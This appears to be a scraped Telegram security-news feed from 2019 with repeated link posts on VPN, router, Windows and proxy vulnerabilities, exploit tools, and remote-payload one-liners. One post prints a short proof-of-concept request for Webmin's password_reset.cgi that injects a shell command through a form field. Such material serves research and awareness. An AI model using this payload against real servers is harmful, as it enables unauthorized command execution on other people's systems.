Forwarded from امنیت اطلاعات
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
Orange
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
This is 🍊 speaking
Forwarded from امنیت اطلاعات
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
RouterOS Post Exploitation
a tool to help enable and maintain root shell access in RouterOS 3.x through the current release.
https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
@sec_nerd_en
a tool to help enable and maintain root shell access in RouterOS 3.x through the current release.
https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
@sec_nerd_en
Medium
RouterOS Post Exploitation
Shared Objects, RC Scripts, and a Symlink
Instagram Explorer tool: Find images by date on Instagram at particular locations,
#OSINT
https://buff.ly/2LoeQR2
#OSINT
https://buff.ly/2LoeQR2
OSINT Combine
Instagram Explorer | OSINT Combine
Release out-of-tree v1.0.0 ― kernel {module, exploit} development tool
https://github.com/jollheef/out-of-tree/releases/tag/v1.0.0
https://github.com/jollheef/out-of-tree/releases/tag/v1.0.0
GitHub
jollheef/out-of-tree
out-of-tree kernel {module, exploit} development tool - jollheef/out-of-tree
Windows 10 x64 1903 • 10.0.18362.113 (WinBuild.160101.0800) • Use After Free
https://cpr-zero.checkpoint.com/vulns/cprid-2132/
https://cpr-zero.checkpoint.com/vulns/cprid-2132/
CPR-Zero
CPR-Zero: CVE-2019-1159
Check Point Research Vulnerability Repository
https://github.com/projectzeroindia/CVE-2019-11510
Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)
Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)
GitHub
GitHub - projectzeroindia/CVE-2019-11510: Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)
Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) - projectzeroindia/CVE-2019-11510
Windows oneliners to download remote payload and execute arbitrary code
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
arno0x0x
Windows oneliners to download remote payload and execute arbitrary code
In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an a…
CVE-2019-12527: Code Execution on Squid Proxy Through a Buffer Overflow
https://www.zerodayinitiative.com/blog/2019/8/22/cve-2019-12527-code-execution-on-squid-proxy-through-a-heap-buffer-overflow
https://www.zerodayinitiative.com/blog/2019/8/22/cve-2019-12527-code-execution-on-squid-proxy-through-a-heap-buffer-overflow
Zero Day Initiative
Zero Day Initiative — CVE-2019-12527: Code Execution on Squid Proxy Through a Buffer Overflow
In this excerpt of a Trend Micro Vulnerability Research Service report, Saran Neti and Sivathmican Sivakumaran of the Trend Micro Research Team detail a recent buffer overflow vulnerability in the Squid web proxy. A remote, unauthenticated attacker could…